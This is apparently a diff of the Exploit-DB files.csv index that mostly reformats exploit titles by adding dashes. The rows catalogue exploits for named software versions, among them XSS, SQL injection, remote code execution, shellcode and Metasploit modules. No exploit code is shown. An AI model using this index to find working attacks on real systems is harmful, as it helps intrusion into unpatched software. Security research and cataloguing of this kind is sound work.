+34660,platforms/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b - embed.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0 +34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b - info.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0 +34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b - lyrics.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0 +34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - adult/video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Include",2014-09-15,Vulnerability-Lab,ios,webapps,0 34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80 -34669,platforms/multiple/remote/34669.rb,"Railo Remote File Inclusion",2014-09-15,Metasploit,multiple,remote,80 -34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,Metasploit,multiple,remote,8400 +34669,platforms/multiple/remote/34669.rb,"Railo - Remote File Inclusion",2014-09-15,Metasploit,multiple,remote,80 +34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload",2014-09-15,Metasploit,multiple,remote,8400 34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,Metasploit,java,remote,9000 34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - CSRF",2014-09-15,"William Costa",linux,webapps,8090 34673,platforms/php/webapps/34673.txt,"Tukanas Classifieds 1.0 - 'index.php' SQL Injection",2009-08-28,Moudi,php,webapps,0 @@ -31264,8 +31264,8 @@ id,file,description,date,author,platform,type,port 34707,platforms/php/webapps/34707.txt,"RadAFFILIATE Links - 'index.php' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 34708,platforms/php/webapps/34708.pl,"Joomla! 'com_tax' Component - 'eid' Parameter SQL Injection",2010-09-23,FL0RiX,php,webapps,0 34709,platforms/php/webapps/34709.txt,"Astrology - 'celebrities.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34710,platforms/php/webapps/34710.txt,"Paypal Shopping Cart Script index.php Multiple Parameter XSS",2009-08-21,"599eme Man",php,webapps,0 -34711,platforms/php/webapps/34711.txt,"Paypal Shopping Cart Script index.php cid Parameter SQL Injection",2009-08-21,"599eme Man",php,webapps,0 +34710,platforms/php/webapps/34710.txt,"Paypal Shopping Cart Script - index.php Multiple Parameter XSS",2009-08-21,"599eme Man",php,webapps,0 +34711,platforms/php/webapps/34711.txt,"Paypal Shopping Cart Script - index.php cid Parameter SQL Injection",2009-08-21,"599eme Man",php,webapps,0 34712,platforms/php/webapps/34712.txt,"FreeWebScriptz HUBScript - 'single_winner1.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0 34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0 @@ -31309,7 +31309,7 @@ id,file,description,date,author,platform,type,port 34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80 34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80 34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 - Command Injection",2014-09-24,Metasploit,windows,remote,3000 -34757,platforms/windows/remote/34757.rb,"Advantech WebAccess dvs.ocx GetColor Buffer Overflow",2014-09-24,Metasploit,windows,remote,0 +34757,platforms/windows/remote/34757.rb,"Advantech WebAccess - dvs.ocx GetColor Buffer Overflow",2014-09-24,Metasploit,windows,remote,0 34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Path Traversal LFI",2014-09-24,Securify,php,webapps,80 34759,platforms/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,php,webapps,80 34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Stored XSS",2014-09-24,"Kenneth F. Belva",php,webapps,80 @@ -31326,9 +31326,9 @@ id,file,description,date,author,platform,type,port 34771,platforms/php/webapps/34771.txt,"PHP Scripts Now Hangman index.php letters Parameter XSS",2009-07-21,Moudi,php,webapps,0 34772,platforms/php/webapps/34772.txt,"Honest Traffic - 'msg' Parameter Cross-Site Scripting",2009-07-17,Moudi,php,webapps,0 34773,platforms/php/webapps/34773.txt,"Horde IMP Webmail 4.3.7 - 'fetchmailprefs.php' HTML Injection",2010-09-27,"Moritz Naumann",php,webapps,0 -34774,platforms/php/webapps/34774.txt,"Hotscripts Type PHP Clone Script feedback.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 -34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP Clone Script index.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 -34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script lostpassword.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 +34774,platforms/php/webapps/34774.txt,"Hotscripts Type PHP Clone Script - feedback.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 +34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP Clone Script - index.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 +34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script - lostpassword.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 34777,platforms/cgi/remote/34777.rb,"GNU Bash - Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",cgi,remote,0 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 @@ -31353,8 +31353,8 @@ id,file,description,date,author,platform,type,port 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include",2014-09-29,Vulnerability-Lab,ios,webapps,0 34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0 34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",hardware,remote,0 -34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 -34810,platforms/php/webapps/34810.txt,"Tausch Ticket Script 3 vote.php descr Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 +34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 - suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 +34810,platforms/php/webapps/34810.txt,"Tausch Ticket Script 3 - vote.php descr Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 34811,platforms/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Parameter Cross-Site Scripting",2009-07-08,"599eme Man",php,webapps,0 34812,platforms/php/webapps/34812.html,"Docebo 3.6 - 'description' Parameter Cross-Site Scripting",2010-10-04,"High-Tech Bridge SA",php,webapps,0 34813,platforms/php/webapps/34813.txt,"Elxis 2009.2 rev2631 - SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps,0 @@ -31374,7 +31374,7 @@ id,file,description,date,author,platform,type,port 34832,platforms/windows/remote/34832.c,"Microsoft Visio 2007 - 'mfc80esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote,0 34833,platforms/php/webapps/34833.txt,"Joomla! and Mambo 'com_trade' Component - 'PID' Parameter Cross-Site Scripting",2010-10-11,FL0RiX,php,webapps,0 34834,platforms/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",jsp,webapps,0 -34835,platforms/windows/remote/34835.py,"e2eSoft VCam DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0 +34835,platforms/windows/remote/34835.py,"e2eSoft VCam DLL Loading - Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 - 'libtidy.dll' DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0 34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component - 'controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator - 'quserex.dll' DLL Loading Arbitrary Code Execution",2010-10-13,anT!-Tr0J4n,windows,remote,0 @@ -31405,8 +31405,8 @@ id,file,description,date,author,platform,type,port 34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443 34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0 34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I PMD Buffer Overflow",2014-10-02,Metasploit,linux,remote,7426 -34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload (Metasploit)",2014-10-02,"Pedro Ribeiro",java,remote,80 -34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 +34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)",2014-10-02,"Pedro Ribeiro",java,remote,80 +34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading - Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plugin - Remote Code Execution",2010-10-19,shinnai,windows,remote,0 34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP - 'survey_result.php' Cross-Site Scripting",2009-07-15,Moudi,php,webapps,0 @@ -31422,8 +31422,8 @@ id,file,description,date,author,platform,type,port 34882,platforms/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting / HTML Injection",2010-10-19,"High-Tech Bridge SA",php,webapps,0 34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' Parameter SQL Injection",2010-10-19,"High-Tech Bridge SA",php,webapps,0 34884,platforms/php/webapps/34884.txt,"JCE-Tech SearchFeed Script - 'index.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 -34885,platforms/php/webapps/34885.txt,"Auction RSS Content Script rss.php id Parameter XSS",2009-08-26,Moudi,php,webapps,0 -34886,platforms/php/webapps/34886.txt,"Auction RSS Content Script search.php id Parameter XSS",2009-08-26,Moudi,php,webapps,0 +34885,platforms/php/webapps/34885.txt,"Auction RSS Content Script - rss.php id Parameter XSS",2009-08-26,Moudi,php,webapps,0 +34886,platforms/php/webapps/34886.txt,"Auction RSS Content Script - search.php id Parameter XSS",2009-08-26,Moudi,php,webapps,0 34887,platforms/php/webapps/34887.txt,"JCE-Tech PHP Video Script - 'index.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 34888,platforms/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,php,webapps,0 34889,platforms/windows/dos/34889.vcf,"Microsoft Windows Mobile Overly Long vCard Name Field Denial of Service",2010-10-21,SecurityArchitect.Org,windows,dos,0 @@ -31460,7 +31460,7 @@ id,file,description,date,author,platform,type,port 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 34925,platforms/php/remote/34925.rb,"WordPress InfusionSoft Plugin - Upload",2014-10-09,Metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer - Remote Command Execution",2014-10-09,Metasploit,windows,remote,80 -34927,platforms/unix/remote/34927.rb,"F5 iControl Remote Root Command Execution",2014-10-09,Metasploit,unix,remote,443 +34927,platforms/unix/remote/34927.rb,"F5 iControl - Remote Root Command Execution",2014-10-09,Metasploit,unix,remote,443 34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0 34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Stored XSS",2014-10-09,"Frank Lycops",multiple,webapps,0 34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,php,webapps,0 @@ -31485,7 +31485,7 @@ id,file,description,date,author,platform,type,port 34949,platforms/multiple/remote/34949.py,"BroadWorks Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",multiple,remote,0 34950,platforms/php/remote/34950.php,"PHP 5.3.2 - 'xml_utf8_decode()' UTF-8 Input Validation",2009-05-11,root@80sec.com,php,remote,0 34951,platforms/php/webapps/34951.txt,"Online Work Order Suite Login SQL Injection",2010-11-02,VSN,php,webapps,0 -34952,platforms/multiple/remote/34952.txt,"Apache Shiro Directory Traversal",2010-11-02,"Luke Taylor",multiple,remote,0 +34952,platforms/multiple/remote/34952.txt,"Apache Shiro - Directory Traversal",2010-11-02,"Luke Taylor",multiple,remote,0 34953,platforms/linux/local/34953.txt,"FUSE fusermount Tool - Race Condition",2010-11-02,halfdog,linux,local,0 34954,platforms/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",hardware,local,0 34955,platforms/php/webapps/34955.txt,"Joomla! 1.5.x - SQL Error Information Disclosure",2010-11-05,"YGN Ethical Hacker Group",php,webapps,0 @@ -31544,13 +31544,13 @@ id,file,description,date,author,platform,type,port 35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 - index.php Multiple Parameter XSS",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0 35019,platforms/windows/local/35019.py,"Windows OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0 -35020,platforms/win_x86/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,Metasploit,win_x86,local,0 +35020,platforms/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060)",2014-10-20,Metasploit,win_x86,local,0 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation",2014-10-20,Metasploit,linux,local,0 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Parameter Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps,0 35026,platforms/php/webapps/35026.txt,"Joomla Store Directory - 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0 35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injection",2010-11-26,ali_err0r,php,webapps,0 35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' Parameter SQL Injection",2010-11-26,KnocKout,php,webapps,0 -35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,Metasploit,windows,remote,0 +35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload",2014-10-21,Metasploit,windows,remote,0 35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 - SQL Injection / Cross-Site Scripting",2010-11-30,BugTracker.NET,asp,webapps,0 35033,platforms/php/remote/35033.rb,"Joomla Akeeba Kickstart - Unserialize Remote Code Execution",2014-10-21,Metasploit,php,remote,80 35034,platforms/multiple/remote/35034.rb,"HP Data Protector - EXEC_INTEGUTIL Remote Code Execution",2014-10-21,Metasploit,multiple,remote,5555 @@ -31655,7 +31655,7 @@ id,file,description,date,author,platform,type,port 35129,platforms/php/webapps/35129.txt,"Who's Who Script - CSRF Exploit (Add Admin Account)",2014-10-31,"ZoRLu Bugrahan",php,webapps,0 35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 - Cross-Site Scripting / Directory Traversal",2010-12-21,waraxe,windows,remote,0 35131,platforms/php/webapps/35131.txt,"Social Share - 'username' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 -35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",linux,remote,0 +35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote - Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",linux,remote,0 35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection",2010-12-22,R4dc0re,php,webapps,0 @@ -31691,7 +31691,7 @@ id,file,description,date,author,platform,type,port 35167,platforms/php/webapps/35167.txt,"Joomla 1.0.x - 'ordering' Parameter Cross-Site Scripting",2011-01-06,"Aung Khant",php,webapps,0 35168,platforms/asp/webapps/35168.txt,"BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure",2011-01-05,"Deniz Cevik",asp,webapps,0 35169,platforms/jsp/webapps/35169.txt,"Openfire 3.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-05,"Walikar Riyaz Ahemed Dawalmalik",jsp,webapps,0 -35170,platforms/hardware/remote/35170.txt,"Lexmark X651de Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote,0 +35170,platforms/hardware/remote/35170.txt,"Lexmark X651de - Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote,0 35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0 35172,platforms/php/webapps/35172.txt,"PHP MicroCMS 1.0.1 - 'page_text' Parameter Cross-Site Scripting",2011-01-06,"High-Tech Bridge SA",php,webapps,0 35173,platforms/linux/dos/35173.txt,"MINIX 3.3.0 - Local Denial of Service PoC",2014-11-06,nitr0us,linux,dos,0 @@ -31701,7 +31701,7 @@ id,file,description,date,author,platform,type,port 35180,platforms/bsd/remote/35180.rb,"Citrix NetScaler SOAP Handler - Remote Code Execution",2014-11-06,Metasploit,bsd,remote,0 35181,platforms/jsp/webapps/35181.txt,"Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities",2014-11-06,"SEC Consult",jsp,webapps,0 35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - vmx86.sys Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 -35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution",2014-11-06,Metasploit,php,remote,80 +35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution",2014-11-06,Metasploit,php,remote,80 35184,platforms/hardware/remote/35184.py,"Belkin n750 jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 35185,platforms/php/webapps/35185.txt,"WonderCMS 0.3.3 - 'editText.php' Cross-Site Scripting",2011-01-04,"High-Tech Bridge SA",php,webapps,0 35186,platforms/php/webapps/35186.txt,"WikLink 0.1.3 - Multiple SQL Injection",2011-01-10,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31747,8 +31747,8 @@ id,file,description,date,author,platform,type,port 35232,platforms/linux/remote/35232.txt,"Pango Font Parsing - 'pangoft2-render.c' Heap Corruption",2011-01-18,"Dan Rosenberg",linux,remote,0 35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0 35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0 -35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,Metasploit,windows,local,0 -35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,Metasploit,windows,local,0 +35235,platforms/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution Through Python (MS14-064)",2014-11-14,Metasploit,windows,local,0 +35236,platforms/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064)",2014-11-14,Metasploit,windows,local,0 35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80 35238,platforms/multiple/webapps/35238.txt,"Gogs (users and repos q pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0 35239,platforms/php/webapps/35239.txt,"PHPCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0 @@ -31969,7 +31969,7 @@ id,file,description,date,author,platform,type,port 35477,platforms/php/webapps/35477.txt,"XOOPS 2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 Tag Nesting Remote Denial of Service",2010-12-21,anonymous,linux,dos,0 35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 - 'error' Parameter HTML Injection",2011-03-19,Hector.x90,php,webapps,0 -35480,platforms/php/webapps/35480.txt,"Online store php script Multiple Cross-Site Scripting / SQL Injection",2011-03-21,"kurdish hackers team",php,webapps,0 +35480,platforms/php/webapps/35480.txt,"Online store php script - Multiple Cross-Site Scripting / SQL Injection",2011-03-21,"kurdish hackers team",php,webapps,0 35481,platforms/php/webapps/35481.txt,"NewsPortal 0.37 - 'post.php' Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Parameter Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0 @@ -32036,7 +32036,7 @@ id,file,description,date,author,platform,type,port 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,hardware,webapps,0 35543,platforms/php/webapps/35543.txt,"WordPress Wp Symposium 14.11 Plugin - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0 -35549,platforms/unix/remote/35549.rb,"ActualAnalyzer 'ant' Cookie Command Execution",2014-12-16,Metasploit,unix,remote,80 +35549,platforms/unix/remote/35549.rb,"ActualAnalyzer - 'ant' Cookie Command Execution",2014-12-16,Metasploit,unix,remote,80 35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,Metasploit,php,remote,80 35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' Parameter SQL Injection",2011-03-30,RoAd_KiLlEr,php,webapps,0 35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0 @@ -32068,7 +32068,7 @@ id,file,description,date,author,platform,type,port 35589,platforms/windows/dos/35589.py,"NotePad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 - Local Privilege Escalation",2014-12-23,LiquidWorm,windows,local,0 35591,platforms/php/webapps/35591.txt,"phpMyRecipes 1.2.2 - (browse.php category param) SQL injection",2014-12-23,"Manish Tanwar",php,webapps,80 -35593,platforms/windows/webapps/35593.txt,"SysAid Server Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 +35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 35595,platforms/linux/local/35595.txt,"GParted 0.14.1 - OS Command Execution",2014-12-23,"SEC Consult",linux,local,0 35596,platforms/php/webapps/35596.txt,"eGroupware 1.8.1 - 'test.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 @@ -32199,7 +32199,7 @@ id,file,description,date,author,platform,type,port 35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting and SQL Injection",2011-05-10,"High-Tech Bridge SA",php,webapps,0 35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0 35739,platforms/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0 -35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler Optimization NULL String Remote Code Execution",2011-03-04,"Brian Mancini",windows,remote,0 +35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler - Optimization NULL String Remote Code Execution",2011-03-04,"Brian Mancini",windows,remote,0 35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0 35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0 @@ -32235,7 +32235,7 @@ id,file,description,date,author,platform,type,port 35773,platforms/osx/dos/35773.c,"OS X 10.10 Bluetooth TransferACLPacketToHW - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0 35774,platforms/osx/dos/35774.c,"OS X 10.10 Bluetooth DispatchHCIWriteStoredLinkKey - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0 35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 -35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise Arbitrary File Upload",2015-01-13,Metasploit,java,remote,9788 +35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise - Arbitrary File Upload",2015-01-13,Metasploit,java,remote,9788 35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows - FILE Privilege Abuse",2015-01-13,Metasploit,windows,remote,0 35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 Plugin - Shell Upload",2015-01-13,Metasploit,php,remote,80 35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework 3.1.1 Help Servlet Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 @@ -32341,7 +32341,7 @@ id,file,description,date,author,platform,type,port 35877,platforms/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Parameter Directory Traversal",2011-06-23,"Andrea Bocchetti",php,webapps,0 35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0 35879,platforms/php/webapps/35879.txt,"WordPress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 -35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0 +35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0 35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.DLL' DLL Loading 